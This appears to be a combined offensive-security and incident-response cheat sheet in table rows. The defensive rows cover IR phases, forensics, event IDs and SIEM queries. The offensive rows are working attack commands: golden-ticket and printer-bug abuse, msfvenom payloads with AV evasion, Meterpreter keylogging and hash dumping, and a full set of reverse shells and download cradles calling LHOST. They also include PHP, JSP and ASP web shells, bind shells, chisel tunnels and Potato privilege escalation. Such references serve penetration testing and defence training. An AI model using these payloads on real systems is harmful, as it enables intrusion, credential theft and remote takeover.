| xfreerdp /u:user /p:pass /v:target /cert-ignore | RDP from Linux (xfreerdp) |
| Invoke-Command -ComputerName target -ScriptBlock {whoami} | PowerShell Remoting (WinRM must be enabled) |
| Enter-PSSession -ComputerName target -Credential (Get-Credential) | Interactive PS remote session |
| net use \\target\ADMIN$ /user:DOMAIN\user pass | Map admin share — verify admin access before moving laterally |
| nltest /domain_trusts /all_trusts | Enumerate all domain trusts (bidirectional, forest, external) |
| Get-DomainTrust | select SourceName,TargetName,TrustType,TrustDirection | PowerView — trust direction and type |
| Get-ForestDomain | All domains in current forest |
| Get-DomainForeignGroupMember | Foreign users in local groups — cross-domain group memberships |
| kerberos::golden /domain:child.domain /krbtgt:HASH /sid:CHILD_SID /sids:FOREST_ROOT_SID-519 | Inter-realm Golden Ticket — SID history injection across trust |
| SID History abuse | Add DA SID of target forest to compromised account's SID history → cross-forest access |
| Unconstrained Delegation + Printer Bug | Force DC to authenticate to unconstrained host → capture TGT → DCSync |
| ms-rprn.py DOMAIN/user:pass@victim_dc -hashes HASH attacker_host | Impacket printer bug — coerce DC authentication |
| msfconsole | Start Metasploit Framework |
| help | Show available commands |
| search type:exploit name:ms17 platform:windows | Search with filters |
| search cve:2021-44228 | Search by CVE number |
| use exploit/windows/smb/ms17_010_eternalblue | Select a module |
| info | Show full module info, options, and references |
| show options | Show required and optional parameters |
| show payloads | Show compatible payloads for current module |
| set RHOSTS 192.168.1.100 | Set target host(s) |
| set LHOST 192.168.1.50 | Set attacker listener IP |
| set LPORT 4444 | Set listener port |
| run / exploit | Execute the module |
| check | Check if target is vulnerable (if supported) |
| back | Go back to main console from module |
| sessions -l | List all active sessions |
| sessions -i 1 | Interact with session 1 |
| jobs -l | List background jobs |
| db_nmap -sV -p- 192.168.1.0/24 | Run Nmap and save results to MSF database |
| msfvenom -l payloads | grep windows | List Windows payloads |
| msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=IP LPORT=4444 -f exe -o shell.exe | Windows x64 staged Meterpreter EXE |
| msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=IP LPORT=4444 -f elf -o shell | Linux x64 staged Meterpreter ELF |
| msfvenom -p php/meterpreter_reverse_tcp LHOST=IP LPORT=4444 -f raw -o shell.php | PHP Meterpreter web shell |
| msfvenom -p windows/x64/shell_reverse_tcp LHOST=IP LPORT=4444 -f exe -o shell.exe | Windows staged shell (no Meterpreter) |
| msfvenom -p windows/x64/meterpreter_reverse_https LHOST=IP LPORT=443 -f exe -o https_shell.exe | HTTPS payload — blends with web traffic |
| msfvenom -p java/meterpreter/reverse_tcp LHOST=IP LPORT=4444 -f war -o shell.war | Java WAR file (Tomcat) |
| msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=IP LPORT=4444 -e x64/xor -i 10 -f exe -o enc_shell.exe | Encoded with 10 iterations (AV evasion attempt) |
| sysinfo | Target system info — OS, hostname, arch |
| getuid | Current user on target |
| getpid | Current process PID |
| ps | Running processes list |
| migrate PID | Migrate to another process (stability / SYSTEM) |
| getsystem | Attempt local privilege escalation to SYSTEM |
| hashdump | Dump local SAM password hashes |
| shell | Drop to OS shell |
| upload /local/file C:\\target\\path | Upload file to target |
| download C:\\target\\file /local/path | Download file from target |
| search -f *.txt -d C:\\Users | Search for files on target |
| keyscan_start | Start keylogger |
| keyscan_dump | Dump captured keystrokes |
| screenshot | Capture desktop screenshot |
| portfwd add -l 3389 -p 3389 -r 192.168.1.100 | Port forward RDP through session |
| background | Background current session (back to msfconsole) |
| run post/multi/recon/local_exploit_suggester | Local exploit suggester |
| exploit/windows/smb/ms17_010_eternalblue | EternalBlue — Windows 7/2008 SMBv1 critical |
| exploit/windows/smb/ms08_067_netapi | MS08-067 — Windows XP/2003 critical |
| exploit/multi/handler | Generic listener — catch manual payloads |
| exploit/unix/webapp/wp_admin_shell_upload | WordPress admin file upload |
| exploit/multi/http/log4shell_header_injection | Log4Shell CVE-2021-44228 |
| exploit/windows/local/bypassuac | UAC bypass (local privesc) |
| auxiliary/scanner/smb/smb_ms17_010 | Check for EternalBlue (scanner, not exploit) |
| auxiliary/scanner/ssh/ssh_login | SSH brute force |
| auxiliary/scanner/http/dir_scanner | Web directory enumeration |
| run post/multi/recon/local_exploit_suggester | Suggest local exploits for current session |
| run post/windows/gather/credentials/credential_collector | Collect browser saved passwords, WiFi keys, etc. |
| run post/windows/gather/smart_hashdump | Dump hashes — handles both local and domain accounts |
| run post/windows/manage/enable_rdp | Enable RDP and add firewall rule |
| run post/multi/manage/shell_to_meterpreter | Upgrade a generic shell session to Meterpreter |
| run post/windows/gather/enum_applications | List installed applications — find outdated software |
| run post/windows/gather/enum_logged_on_users | Users currently logged on and recently logged on |
| run post/windows/gather/arp_scanner RHOSTS=192.168.1.0/24 | ARP scan from compromised host — internal network mapping |
| run post/multi/gather/ssh_creds | Collect SSH keys from home directories |
| run auxiliary/server/capture/smb | Start SMB capture server — catch NTLMv2 hashes |
| route add 10.10.10.0/24 SESSION_ID | Add internal subnet route through Meterpreter session |
| route print | Show MSF routing table |
| use auxiliary/server/socks_proxy; set SRVPORT 1080; run | Start SOCKS4/5 proxy through pivot session |
| portfwd add -l 3389 -p 3389 -r 10.10.10.5 | Port forward RDP to internal host via Meterpreter |
| portfwd list | Show active port forwards in session |
| use post/multi/manage/autoroute; set SESSION 1; run | Auto-add routes for all subnets accessible from pivot |
| proxychains nmap -sT -Pn 10.10.10.0/24 | Route Nmap through SOCKS proxy (requires TCP connect scan) |
| meterpreter > run auxiliary/scanner/portscan/tcp RHOSTS=10.10.10.0/24 | Port scan internal network from pivot (no proxychains needed) |
| db_status | Check if PostgreSQL database is connected |
| workspace | List all workspaces |
| workspace -a client_pentest | Create and switch to new workspace |
| hosts | All discovered hosts in current workspace |
| services | All discovered services (from scans and sessions) |
| vulns | All confirmed vulnerabilities |
| creds | All collected credentials |
| loot | All files/data collected from targets |
| db_import scan.xml | Import Nmap XML results into MSF database |
| db_export -f xml /tmp/results.xml | Export all findings to XML for reporting |
| 1. Preparation | IR team, playbooks, tools, communication trees, and backup procedures in place before incident |
| 2. Detection & Analysis | Identify IOCs, determine scope/severity/affected assets, classify incident type |
| 3. Containment — Short-term | Isolate affected systems, block IOCs at firewall, disable compromised accounts |
| 3. Containment — Long-term | Patch entry points, segment network, replace affected systems |
| 4. Eradication | Remove malware, close entry points, reset all credentials, rebuild systems if needed |
| 5. Recovery | Restore from clean backups, monitor closely, verify normal operation |
| 6. Lessons Learned | Timeline documentation, root cause analysis, playbook updates, detection improvement |
| Identify alert source | SIEM / EDR / user report / IDS / external notification? |
| Classify severity | Critical=active exfil/ransomware; High=confirmed compromise; Medium=suspicious; Low=anomaly |
| DO NOT reboot yet | Volatile data (RAM, connections, processes) will be lost — capture first |
| Preserve volatile data first | Order: memory → network connections → running processes → open files → logs |
| Document everything in UTC | Who, what, when, how — timestamped in UTC. Court-admissible chain of custody |
| Verify before acting | Cross-check IOC against threat intel. Avoid false-positive containment of prod systems |
| Notify stakeholders | Per escalation matrix: manager → CISO → legal → compliance (if PII involved) |
| netstat -ano | Active connections with PID — look for unusual ports/IPs |
| tasklist /svc | Running processes with hosted services |
| wmic process get name,pid,parentprocessid,commandline | Full process list with command lines |
| schtasks /query /fo LIST /v | findstr "Task Name\|Run As\|Task To Run" | Scheduled tasks — persistence check |
| reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run | Autorun keys (HKLM) |
| reg query HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run | Autorun keys (HKCU — per user) |
| sc query type= all state= all | All services including stopped |
| net user /domain | Domain users — check for backdoor accounts |
| net localgroup administrators | Local admin group — unauthorized members? |
| ipconfig /all | Network adapters — look for suspicious tunneling adapters |
| route print | Routing table — unusual routes added? |
| Get-EventLog -LogName Security -EntryType FailureAudit -Newest 50 | Recent security failures |
| 4624 | Successful logon — Type 2=interactive, 3=network, 10=remote, 4=batch |
| 4625 | Failed logon — look for volume from same source (brute force) |
| 4648 | Logon using explicit credentials — runas, Pass-the-Hash indicator |
| 4672 | Special privileges assigned — admin logins |
| 4688 | New process created — enable command line auditing to see full args |
| 4689 | Process terminated |
| 4698 | Scheduled task created — persistence mechanism |
| 4720 / 4726 | User created / deleted |
| 4732 | Member added to local admin group |
| 4756 | Member added to universal security group |
| 4771 | Kerberos pre-auth failed — possible AS-REP Roasting or brute force |
| 4776 | NTLM authentication attempt — NTLM should be rare in modern AD |
| 7045 | New service installed — common persistence/privilege escalation |
| 1102 | Audit log cleared critical — attacker covering tracks |
| 4104 | PowerShell script block logging — reveals obfuscated PS commands |
| 4103 | PowerShell module logging |
| w && who && last -a | head -30 | Active users + login history |
| ps auxf --sort=-pcpu | Process tree sorted by CPU |
| ss -tulpn && netstat -tulpn | All listening services with PIDs |
| lsof -i -n -P | All open network connections |
| find /tmp /var/tmp /dev/shm -type f -ls 2>/dev/null | Files in world-writable dirs (malware drops) |
| crontab -l 2>/dev/null; ls /etc/cron* | All cron jobs |
| find / -newer /tmp/baseline -type f 2>/dev/null | Files newer than a reference time (new files) |
| awk '!seen[$0]++' /etc/passwd | Check for duplicate users in passwd |
| grep -r "NOPASSWD" /etc/sudoers* 2>/dev/null | Sudo without password — privesc risk |
| find / -name ".ssh" -type d 2>/dev/null | xargs ls -la | Find all .ssh directories and authorized_keys |
| Immediate: Network Isolate | Disconnect affected hosts from network (physically or via NAC/firewall). Do NOT power off — volatile evidence lost. |
| Identify patient zero | Check earliest encrypted file timestamps, email logs, VPN/RDP logs for initial access time and vector |
| Check vssadmin list shadows | Were shadow copies deleted? (attacker command: vssadmin delete shadows /all /quiet) |
| Identify encryption extension | Note the appended extension (e.g., .locked, .encrypted) — use ID Ransomware site to identify family |
| DO NOT pay immediately | Check: NoMoreRansom.org for free decryptors first. Notify legal and law enforcement (FBI IC3) |
| Check lateral spread | Query SIEM for same process tree, C2 connections, or SMB activity from patient zero to other hosts |
| Preserve ransom note | Hash and collect ransom note files — contain unique victim ID needed for decryption if key purchased |
| Restore from backup | Verify backups are clean (not encrypted) and offline. Restore to clean images, not same compromised OS |
| Post-incident: audit | Identify and close entry point (patching, credential reset, MFA on RDP/VPN). Hunt for other implants before going live |
| winpmem_mini.exe memory.raw | Windows memory dump — lightweight, no driver install required |
| DumpIt.exe | Moonsols DumpIt — click to dump, creates .raw in same dir |
| FTK Imager → File → Capture Memory | GUI memory acquisition with pagefile option |
| Task Manager → Details → Right-click → Create Dump File | Quick process memory dump (single process only) |
| procdump.exe -ma lsass.exe lsass.dmp | Sysinternals — dump LSASS for offline cred extraction |
| sudo avml /tmp/memory.lime | Linux memory acquisition via AVML (Rust-based, no kernel module) |
| sudo insmod lime.ko "path=/tmp/mem.lime format=lime" | Linux LiME kernel module memory dump |
| sudo dd if=/dev/mem bs=1M of=/tmp/mem.raw 2>/dev/null | Linux raw memory (limited — misses high memory on modern systems) |
| Size check: phys_addr_ranges in /proc/iomem | Linux: check physical memory ranges before capturing |
| aws cloudtrail lookup-events --lookup-attributes AttributeKey=Username,AttributeValue=compromised-user | Get all API calls by compromised user |
| aws iam list-attached-user-policies --user-name attacker | What permissions does the compromised user have? |
| aws ec2 describe-instances --filters "Name=instance-state-name,Values=running" | List all running EC2 instances — look for rogue instances |
| aws s3api get-bucket-acl --bucket bucket-name | Check if S3 bucket is publicly accessible |
| aws guardduty list-findings --detector-id ID | List GuardDuty threat findings |
| aws iam create-policy + attach → isolate | Containment: attach deny-all policy to compromised IAM role/user |
| aws ec2 create-snapshot --volume-id vol-xxx | Snapshot compromised EC2 volume for forensic copy |
| aws logs get-log-events --log-group-name /aws/cloudtrail --log-stream-name stream | Read CloudTrail logs from CloudWatch |
| Disable access key: aws iam update-access-key --status Inactive | Revoke compromised API key immediately |
| 1. CPU registers / cache | Most volatile — lost immediately on any change |
| 2. RAM (memory) | Running processes, encryption keys, network connections, unencrypted data |
| 3. Network state | Active connections, ARP cache, routing tables, firewall state |
| 4. Running processes | Process list, open files, loaded modules |
| 5. Disk (file system) | Files, logs, registry, artifacts — less volatile but still changes |
| 6. Remote logging | Centralized SIEM logs — already preserved off-host |
| 7. Backups / archives | Most stable — historical snapshots |
| vol -f memory.raw windows.info | OS profile and basic system info |
| vol -f memory.raw windows.pslist | List processes (from EPROCESS list) |
| vol -f memory.raw windows.pstree | Process tree with parent-child |
| vol -f memory.raw windows.psscan | Scan for processes (finds hidden/unlinked) |
| vol -f memory.raw windows.cmdline | Command lines for each process |
| vol -f memory.raw windows.netscan | Network connections and sockets |
| vol -f memory.raw windows.dlllist --pid 1234 | DLLs loaded by specific process |
| vol -f memory.raw windows.malfind | Find injected code / suspicious memory regions |
| vol -f memory.raw windows.hashdump | Extract NTLM password hashes from SAM |
| vol -f memory.raw windows.registry.hivelist | List registry hives in memory |
| vol -f memory.raw windows.filescan | Scan for file objects in memory |
| vol -f memory.raw windows.dumpfiles --pid 1234 | Dump files associated with process |
| C:\Windows\Prefetch\*.pf | Program execution evidence — last 8 run times, up to 128 entries |
| C:\Users\*\AppData\Roaming\Microsoft\Windows\Recent\ | Recently accessed files (LNK shortcut files) |
| C:\Users\*\NTUSER.DAT | User registry hive — contains most user-specific artifacts |
| C:\Windows\System32\winevt\Logs\ | Windows Event Log files (.evtx) |
| C:\Windows\System32\config\ | System registry hives: SAM, SYSTEM, SECURITY, SOFTWARE |
| C:\$MFT | Master File Table — metadata for every file ever on NTFS volume |
| C:\$LogFile | NTFS journal — file system change log |
| C:\Windows\AppCompat\Programs\Amcache.hve | Program execution and SHA1 hashes of executables |
| C:\Windows\AppCompat\Programs\Shimcache | Application Compatibility Cache — executed programs list |
| C:\Users\*\AppData\Local\Microsoft\Windows\UsrClass.dat | ShellBags — folder access history |
| HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion | OS version, install date, registered owner |
| HKLM\SYSTEM\CurrentControlSet\Services | Installed services (malware persistence) |
| HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run | System-wide autorun programs |
| HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run | Per-user autorun programs |
| HKLM\SYSTEM\CurrentControlSet\Control\TimeZoneInformation | System timezone (critical for timeline) |
| HKLM\SAM\SAM\Domains\Account\Users | Local user accounts and password hashes |
| HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs | Recently opened documents |
| HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\RunMRU | Run dialog history |
| HKCU\SOFTWARE\Microsoft\Internet Explorer\TypedURLs | URLs typed in IE address bar |
| NTUSER.DAT\SOFTWARE\Microsoft\Windows\Shell\BagMRU | ShellBags — folder navigation history |
| Chrome History | %LOCALAPPDATA%\Google\Chrome\User Data\Default\History (SQLite) |
| Chrome Downloads | %LOCALAPPDATA%\Google\Chrome\User Data\Default\History — Downloads table |
| Chrome Cookies | %LOCALAPPDATA%\Google\Chrome\User Data\Default\Cookies |
| Chrome Passwords | %LOCALAPPDATA%\Google\Chrome\User Data\Default\Login Data (encrypted) |
| Firefox History | %APPDATA%\Mozilla\Firefox\Profiles\*.default\places.sqlite |
| Edge History | %LOCALAPPDATA%\Microsoft\Edge\User Data\Default\History |
| Extract Chrome history (Linux) | sqlite3 History "SELECT url,title,last_visit_time FROM urls ORDER BY last_visit_time DESC LIMIT 50" |
| dd if=/dev/sda of=/mnt/evidence/disk.img bs=4M conv=noerror,sync status=progress | Full disk image with dd — sync fills read errors with zeros |
| dcfldd if=/dev/sda of=disk.img hash=sha256 hashlog=hash.txt bs=4M | dcfldd — dd with built-in hashing and progress (forensic dd) |
| ewfacquire /dev/sda | Acquire to Expert Witness Format (.E01) — compressed, with metadata |
| sha256sum disk.img > disk.img.sha256 | Hash image immediately after acquisition — document in chain of custody |
| fdisk -l disk.img | Show partition table of acquired image |
| mount -o loop,ro,offset=$((512*START)) disk.img /mnt/evidence | Mount partition from image read-only (offset = sector * 512) |
| autopsy | GUI forensic suite — timeline, file carving, keyword search, hash lookup |
| mmls disk.img | Sleuth Kit — list partition layout of disk image |
| fls -r -m / disk.img | mactime -b - > timeline.txt | Build MAC-time filesystem timeline from disk image |
| icat disk.img inode_num > recovered_file | Extract file by inode from disk image (even if deleted) |
| Received: from | Trace email path — read bottom-up (first hop at bottom, last at top) |
| X-Originating-IP | Client IP that submitted the email — most useful for phishing origin |
| Return-Path / Reply-To | Mismatch between From and Return-Path → likely spoofed or phishing |
| DKIM-Signature: d=domain.com | Signing domain — should match From domain. Verify with public DNS key. |
| Authentication-Results: spf=pass | SPF result — fail or softfail means sender not authorized for that domain |
| Authentication-Results: dmarc=fail | DMARC fail — neither SPF nor DKIM aligned with From domain |
| Message-ID: <id@domain> | Unique message identifier — should match sending mail server's domain |
| X-Mailer / User-Agent | Mail client used — unusual values may indicate automated sending |
| MXToolbox Email Header Analyzer | Paste full headers at mxtoolbox.com/EmailHeaders — visualizes hop timing and auth results |
| Submission timestamp vs Received | Large time gaps between Received hops indicate queue delays or relay manipulation |
| grep "4624\|4625\|4648" Security.evtx.export.txt | head -100 | Filter exported Windows event log for logon events |
| Get-WinEvent -FilterHashtable @{LogName='Security';Id=4624} -MaxEvents 50 | Format-List | PowerShell — query event log with filter |
| wevtutil qe Security "/q:*[System[EventID=4688]]" /f:text /c:100 | Query EVTX for process creation events (wevtutil) |
| log2timeline.py /output/plaso.db /path/to/evidence | Plaso — ingest all log sources into single super-timeline |
| psort.py -z UTC -o l2tcsv /output/plaso.db "GREP TERM" > timeline.csv | Filter Plaso timeline and export to CSV |
| cat access.log | awk '{print $7}' | sort | uniq -c | sort -rn | head -30 | Top requested URI paths from Apache/Nginx access log |
| zcat /var/log/auth.log.*.gz | grep "Accepted" | Search compressed rotated log files without extracting |
| journalctl --since "2024-01-01" --until "2024-01-02" -u ssh | SSH logs between specific dates from systemd journal |
| bash -i >& /dev/tcp/LHOST/LPORT 0>&1 | Bash TCP reverse shell |
| bash -c 'bash -i >& /dev/tcp/LHOST/LPORT 0>&1' | Bash (exec wrapper) |
| 0<&196;exec 196<>/dev/tcp/LHOST/LPORT; sh <&196 >&196 2>&196 | Bash — alternative method |
| python3 -c 'import socket,subprocess,os;s=socket.socket();s.connect(("LHOST",LPORT));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/sh","-i"])' | Python 3 reverse shell |
| python -c 'import socket,subprocess,os;s=socket.socket();s.connect(("LHOST",LPORT));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];subprocess.call(["/bin/sh","-i"])' | Python 2 reverse shell |
| php -r '$sock=fsockopen("LHOST",LPORT);exec("/bin/sh -i <&3 >&3 2>&3");' | PHP reverse shell |
| nc -e /bin/sh LHOST LPORT | Netcat with -e (if supported) |
| rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc LHOST LPORT >/tmp/f | Netcat without -e (mkfifo method) |
| perl -e 'use Socket;$i="LHOST";$p=LPORT;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};' | Perl reverse shell |
| ruby -rsocket -e 'f=TCPSocket.open("LHOST",LPORT).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)' | Ruby reverse shell |
| powershell -NoP -NonI -W Hidden -Exec Bypass -Command New-Object System.Net.Sockets.TCPClient("LHOST",LPORT);$stream=$client.GetStream();[byte[]]$bytes=0..65535|%{0};while(($i=$stream.Read($bytes,0,$bytes.Length))-ne 0){;$data=(New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0,$i);$sendback=(iex $data 2>&1|Out-String);$sendback2=$sendback+"PS "+(pwd).Path+"> ";$sendbyte=([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close() | Full PowerShell TCP reverse shell |
| IEX(New-Object Net.WebClient).downloadString('http://LHOST/Invoke-PowerShellTcp.ps1') | Download and execute Nishang TCP reverse shell |
| powershell -exec bypass -c "IEX(New-Object Net.WebClient).DownloadString('http://LHOST/shell.ps1')" | Common PS download cradle — execution bypass |
| powershell -EncodedCommand [base64_encoded_payload] | Base64-encoded PS command (obfuscation) |
| echo "IEX..." | iconv -t utf-16le | base64 -w0 | Encode PS payload to base64 (UTF-16LE required) |
| python3 -c 'import pty;pty.spawn("/bin/bash")' | Step 1: Spawn PTY with Python |
| python -c 'import pty;pty.spawn("/bin/bash")' | Step 1: Python 2 version |
| Ctrl+Z | Step 2: Background the netcat session |
| stty raw -echo; fg | Step 3: Raw terminal mode, foreground session |
| export TERM=xterm-256color | Step 4: Set terminal type |
| stty rows 50 cols 200 | Step 5: Set terminal size (match your window) |
| script /dev/null -c bash | Alternative to Python — uses script command |
| /usr/bin/script -qc /bin/bash /dev/null | script method full command |
| python3 -m http.server 8080 | Start HTTP server on port 8080 (attacker side) |
| wget http://LHOST:8080/file -O /tmp/file | Download via wget (target side) |
| curl http://LHOST:8080/file -o /tmp/file | Download via curl |
| certutil.exe -urlcache -f http://LHOST/file.exe C:\file.exe | Windows download via certutil (LOL binary) |
| powershell -c "(New-Object Net.WebClient).DownloadFile('http://LHOST/file','C:\file')" | PowerShell download |
| Invoke-WebRequest -Uri http://LHOST/file -OutFile C:\file | PowerShell IWR download |
| scp file user@target:/tmp/file | Secure copy via SSH |
| nc -lvp 4444 > file_received && nc LHOST 4444 < file_to_send | Transfer via netcat |
| base64 file | xclip -sel clip | Encode to base64 — paste through shell |
| impacket-smbserver share . -smb2support | Start SMB server in current dir (Windows targets) |
| <?php system($_GET['cmd']); ?> | Minimal PHP web shell — ?cmd=id |
| <?php echo shell_exec($_GET['c']); ?> | PHP shell_exec variant |
| <?php passthru($_REQUEST['cmd']); ?> | PHP passthru — GET or POST |
| <?php if(isset($_REQUEST['cmd'])){echo "<pre>";$cmd=$_REQUEST['cmd'];system($cmd);echo "</pre>";die;} ?> | PHP with pre tags for formatted output |
| <% Runtime.getRuntime().exec(request.getParameter("cmd")); %> | JSP web shell (Tomcat) |
| <% eval request("cmd") %> | ASP web shell (Classic ASP) |
| curl http://target/shell.php?cmd=id | Execute command via GET |
| curl -X POST http://target/shell.php -d "cmd=id" | Execute via POST (less visible in logs) |
| nc -lvp 4444 -e /bin/bash | Linux bind shell — listen on 4444, connect from attacker: nc TARGET 4444 |
| ncat -lvp 4444 --sh-exec /bin/bash | Ncat bind shell (more reliable than nc -e) |
| python3 -c 'import socket,subprocess,os;s=socket.socket();s.bind(("0.0.0.0",4444));s.listen(1);c,a=s.accept();[os.dup2(c.fileno(),fd) for fd in(0,1,2)];subprocess.call(["/bin/sh"])' | Python bind shell |
| powershell -NoP -NonI -W Hidden -c "$l=New-Object Net.Sockets.TcpListener(4444);$l.Start();$c=$l.AcceptTcpClient();$s=$c.GetStream();[byte[]]$b=0..65535|%{0};while(($i=$s.Read($b,0,$b.Length))-ne 0){$d=(New-Object Text.ASCIIEncoding).GetString($b,0,$i);$sb=(iex $d 2>&1|Out-String);$sb+='PS '+(pwd).Path+'> ';$se=([Text.Encoding]::ASCII).GetBytes($sb);$s.Write($se,0,$se.Length)}" | PowerShell bind shell |
| msfvenom -p windows/x64/shell_bind_tcp LPORT=4444 -f exe -o bind.exe | Windows bind shell payload via msfvenom |
| socat TCP-LISTEN:4444,reuseaddr,fork EXEC:/bin/bash | Socat bind shell — full duplex, handles multiple connections |
| socat TCP:LHOST:4444 EXEC:/bin/bash,pty,stderr,setsid,sigint,sane | Socat reverse shell — full TTY (no upgrade needed!) |
| socat TCP-LISTEN:4444,reuseaddr FILE:`tty`,raw,echo=0 | Socat listener — attach to incoming full TTY session |
| socat TCP:LHOST:443 OPENSSL-LISTEN:444,cert=cert.pem,verify=0,fork | Socat SSL tunnel — encrypted reverse shell |
| chisel server -p 8080 --reverse | Chisel server (attacker) — start reverse tunnel listener |
| chisel client ATTACKER:8080 R:socks | Chisel client (target) — create SOCKS5 reverse tunnel back to attacker |
| chisel client ATTACKER:8080 R:3306:127.0.0.1:3306 | Chisel — expose target's internal MySQL port on attacker's 3306 |
| chisel server -p 8080 --reverse --auth user:pass | Chisel with authentication — prevents unauthorized tunnel hijacking |
| proxychains4 ssh user@internal-host | Use proxychains with chisel SOCKS tunnel to reach internal hosts |
| whoami /priv | Current user privileges — look for SeImpersonatePrivilege, SeDebugPrivilege |
| SeImpersonatePrivilege → Potato | SeImpersonate enabled = run GodPotato, PrintSpoofer, or JuicyPotato for SYSTEM |
| PrintSpoofer64.exe -i -c cmd | Exploit SeImpersonatePrivilege via Print Spoofer → SYSTEM shell |
| GodPotato -cmd "net localgroup administrators user /add" | GodPotato — works on Windows 2012-2022 |
| winPEAS.exe | Automated Windows privesc enumeration — checks all common paths |
| .\Seatbelt.exe -group=all | Seatbelt — targeted local system survey for misconfigs |
| sc qc "ServiceName" | Check service binary path — is it writable? |
| icacls "C:\Path\to\service.exe" | Check file permissions — BUILTIN\Users:(F) = full control = pwned |
| reg query "HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer" /v AlwaysInstallElevated | AlwaysInstallElevated = 1 → create malicious MSI → SYSTEM |
| Get-Hotfix | sort InstalledOn -Desc | head -10 | Recently installed patches — identify missing patches for kernel exploits |
| 1. Validate | True positive or false positive? Context: user behavior, asset criticality, time of day |
| 2. Enrich | Add threat intel: VirusTotal, Shodan, AbuseIPDB, internal CMDB, user account info |
| 3. Scope | Isolated or widespread? Check for lateral movement, other alerts from same source |
| 4. Classify | Phishing / Malware / Brute Force / Insider / DDoS / Exfiltration / Ransomware |
| 5. Respond | Follow runbook for alert type. Document all actions with UTC timestamps |
| 6. Close | Resolution, ticket update, tuning if FP, lessons learned |
| T1566 — Phishing | Suspicious sender, attachment types (.iso,.lnk,.docm), unusual domain, urgency |
| T1059 — Command Interpreter | PowerShell/cmd/bash with obfuscated args, unusual parent process |
| T1078 — Valid Accounts | Legitimate creds misused: off-hours, new geo, impossible travel, bulk access |
| T1055 — Process Injection | Process writing to another: lsass, explorer, svchost injection |
| T1110 — Brute Force | Many 4625 events, rapid auth failures, password spray (1 attempt per many accounts) |
| T1071 — Application Layer C2 | Beaconing: regular intervals, low byte count, encrypted POST to rare domains |
| T1048 — Exfiltration | Large DNS TXT responses, cloud storage uploads, unusual FTP/HTTP data-out volume |
| T1547 — Boot Persistence | New Run keys, scheduled tasks, services, startup folder items |
| T1003 — Credential Dumping | LSASS access by non-SYSTEM process, SAM dump, Mimikatz artifact names |
| T1021 — Lateral Movement | SMB/WMI/RDP between internal hosts, PsExec artifacts, admin share access |
| T1486 — Data Encrypted (Ransomware) | Mass file renames, shadow copy deletion (vssadmin delete), encryption process |
| T1562 — Impair Defenses | AV/EDR disable, firewall rule changes, log clearing, Safe Mode boot |
| index=windows EventCode=4625 | stats count by src_ip | sort -count | head 20 | Top IPs with failed logins |
| index=windows EventCode=4624 Logon_Type=10 | stats count by Account_Name, src_ip | Remote interactive logins |
| index=windows EventCode=4688 | rex field=CommandLine "(?<cmd>powershell|cmd|wscript|cscript)" | stats count by cmd,Account_Name | Script interpreter usage |
| index=proxy | stats sum(bytes_out) by src_ip | sort -sum(bytes_out) | head 10 | Top data exfiltrators by bytes |
| index=dns | stats count by query | sort -count | head 50 | Most queried domains |
| index=windows earliest=-24h | timechart count by EventCode | Event volume over 24h by EventCode |
| | tstats count WHERE index=* BY _time span=1h host | anomalydetection | Anomaly detection on host event volume |
| event.code : "4625" and winlog.event_data.LogonType : "3" | Network logon failures |
| event.code : "4688" and process.command_line : *mimikatz* | Mimikatz execution |
| event.category : "network" and destination.port : (4444 or 1337 or 8888) | Connections to common backdoor ports |
| process.name : "powershell.exe" and process.args : (*-enc* or *-encoded*) | Encoded PowerShell commands |
| dns.question.name : /.*\.ru$/ or dns.question.name : /.*\.cn$/ | DNS queries to specific TLDs |
| event.code : "1102" or event.code : "104" | Security log or System log cleared |
| File Hash (SHA256) High | Unique per file. Most reliable IOC. Never rely on MD5 alone (collision risk) |
| Network Signature High | Protocol anomalies, beacon timing patterns, Snort/Yara network rules |
| Mutex / Registry Key High | Often hardcoded in malware families — very specific |
| URL Medium-High | More specific than domain — full path including parameters |
| Domain Medium | DGA domains rotate. Check WHOIS age, cert, registrar context |
| IP Address Medium | IPs rotate frequently. Check ASN, hosting provider, geo context |
| Email Address Low-Medium | Easily spoofed. Validate via SPF/DKIM/DMARC headers |
| User Agent Low | Trivially changed. Useful only for correlation, not attribution |
| Windows Security Log | Logon/logoff, process creation (4688), privilege use, account changes |
| Windows Sysmon (Event ID 1-28) | Process create, network connections, file hash, DNS queries, registry — essential |
| PowerShell Script Block (4104) | Decoded PowerShell — catches all obfuscation |
| DNS Server Logs | All queries — DGA detection, tunneling, C2 beaconing, exfil |
| Firewall / NSG Logs | Allow/deny, port scans, geo anomalies, policy violations |
| Web Proxy / Gateway | URLs, categories, bytes transferred, user agents, MIME types |
| EDR Telemetry | Process trees, file operations, network per-process, memory events |
| Active Directory Logs | Group changes, LDAP enumeration, account lockouts, Kerberos events |
| Email Gateway | Attachments, links, SPF/DKIM/DMARC failures, sender reputation |
| VPN / Remote Access | Impossible travel, concurrent sessions, off-hours access, new devices |
| VirusTotal | Hash / IP / domain / URL — 70+ AV engine scan results |
| Shodan | Internet-exposed devices, open ports, CVEs, banner info |
| AbuseIPDB | IP abuse reports — brute force, C2, spam history |
| URLScan.io | Safe website analysis — screenshot + network requests without visiting |
| ANY.RUN | Interactive malware sandbox — real-time analysis |
| MalwareBazaar | Malware sample database by abuse.ch — search by hash/family |
